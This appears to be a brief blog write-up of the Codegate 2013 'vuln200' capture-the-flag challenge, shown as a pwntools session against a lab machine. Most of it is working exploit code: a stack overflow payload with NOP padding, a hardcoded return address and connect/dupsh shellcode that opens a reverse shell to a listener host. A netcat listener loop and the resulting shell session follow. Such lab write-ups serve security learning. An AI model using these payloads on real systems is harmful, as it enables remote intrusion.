
codegate_quals vuln200

Date: 2015-12-15 22:45:18


======================= try 1 =======================

from pwn import *

r=remote('192.168.1.104',7777)

>>> r=remote('192.168.1.104',7777)

[x] Opening connection to 192.168.1.104 on port 7777

[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104

[+] Opening connection to 192.168.1.104 on port 7777: Done

>>> print(r.recv(1024))

CODEGATE 2013 Util service!

[*] md5

[*] help

[*] base64 encode

[*] base64 decode

[*] quit

>>> r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)).ljust(0xf0, '\x90')+p32(0xbfdf18cc)))

 

Listener service on the attacker side:

# strace -f nc -l -p 7777

......

bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0)                                = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4

......

======================= try 2 =======================

Attacker side:

r.close()
r=remote('192.168.1.104',7777)
print(r.recv(1024))
r.send('write' + (asm(shellcraft.i386.linux.connect('192.168.1.109',7777)+shellcraft.i386.linux.dupsh(sock='ebp'))).ljust(0xf0, '\x90')+p32(0xbfdf18cc))

 

Reverse shell:

# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:24:54:7b:d2:d9 
          inet addr:192.168.1.104  Bcast:192.168.1.255  Mask:255.255.255.0

......

 


Original post: http://www.cnblogs.com/scoder/p/5049665.html
